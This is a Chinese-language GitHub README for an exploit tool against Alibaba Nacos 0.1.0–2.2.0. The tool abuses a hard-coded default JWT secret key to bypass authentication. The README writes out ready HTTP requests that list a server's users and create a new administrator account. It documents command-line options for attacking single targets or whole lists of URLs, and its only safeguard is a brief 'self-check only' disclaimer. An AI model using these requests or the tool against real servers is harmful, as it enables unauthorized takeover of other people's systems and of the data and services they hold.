Skip to content

Alibaba Nacos存在默认token.secret.key,导致远程攻击者可以绕过密钥认证接管Nacos

Notifications You must be signed in to change notification settings

Dghpi9/NacosDefaultToken

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 

Repository files navigation

首发于t00ls.com,仅限安全自检,非法使用所造成的一切后果由使用者承担

漏洞原理

好多大佬都分享过了,这里就简单说下:

Nacos漏洞版本/conf 默认配置文件 application.properties 中,nacos.core.auth.default.token.secret.key 使用了硬编码,使用该key可构造jwt进行token认证。

认证成功后获得accessToken ,使用accessToken 可对Naocs进行任意操作(这不废话么,已经登录了)

影响范围

0.1.0 <= Nacos <= 2.2.0

工具思路

既然登录后使用accessToken可以进行任意操作,那直接查看管理员或者干脆新增用户登录不就得了么,这里加上认证成功后的token 直接使用CVE-2021-29441的payload读取用户列表和新增系统用户,如下:

查看用户列表

GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
Host: xxx
accessToken: xxxxxx

新增管理员

POST /nacos/v1/auth/users HTTP/1.1
Host: xxx
Content-Type: application/x-www-form-urlencoded
accessToken: xxx
Content-Length: 27

username=fuck&password=fuck

Tools Usage

_____                 ____      ___         _ _   _____     _
|   | |___ ___ ___ ___|    \ ___|  _|___ _ _| | |_|_   _|___| |_ ___ ___
| | | | .'|  _| . |_ -|  |  | -_|  _| .'| | | |  _| | | | . | '_| -_|   |
|_|___|__,|___|___|___|____/|___|_| |__,|___|_|_|   |_| |___|_,_|___|_|_|

Alibaba Nacos Default Token身份认证绕过 author: Dghpi9
vul version: 0.1.0 <= Nacos <= 2.2.0
Usage:
 -u http://192.168.0.1:8848 -g  读取用户列表
 -u http://192.168.0.1:8848 -a  新增系统用户
 -f url.txt -g  批量读取用户列表
 -f url.txt -a  批量新增用户
Options:
  -u string
        指定单个目标
  -f string
        传入文件列表
  -g    读取用户列表
  -a    新增系统用户

About

Alibaba Nacos存在默认token.secret.key,导致远程攻击者可以绕过密钥认证接管Nacos

Resources

Stars

Watchers

Forks

Packages

No packages published